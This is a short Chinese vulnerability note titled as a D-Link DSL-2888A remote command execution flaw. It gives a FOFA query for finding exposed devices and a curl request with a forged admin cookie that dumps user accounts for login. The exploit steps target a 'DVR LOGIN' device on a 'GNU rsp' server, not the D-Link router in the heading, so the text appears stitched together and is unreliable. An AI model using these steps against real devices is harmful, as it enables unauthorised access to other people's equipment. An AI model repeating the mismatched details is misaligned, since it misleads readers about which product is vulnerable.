D-Link DSL-2888A 远程命令执行漏洞（CVE-2020-24581/24579）

漏洞详情

D-Link DSL-2888A AU_2.31_V1.1.47ae55之前版本存在和远程命令执行漏洞，该漏洞源于包含一个execute cmd.cgi特性(不能通过web用户界面访问)，该特性允许经过身份验证的用户执行操作系统命令。在该版本固件中同时存在着一个不安全认证漏洞（CVE-2020-24580），在登录界面输入任意密码就可以成功访问路由器界面。通过组合这两个漏洞可以实现未授权的任意代码执行。
 

漏洞影响

AU_2.31_V1.1.47ae55之前版本

EG_1.00b4

漏洞利用

fofa :header="Server: GNU rsp/1.0" title="DVR LOGIN"

curl "http://ip/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"

这里获取到用户名admin，密码为空，既可以进行登录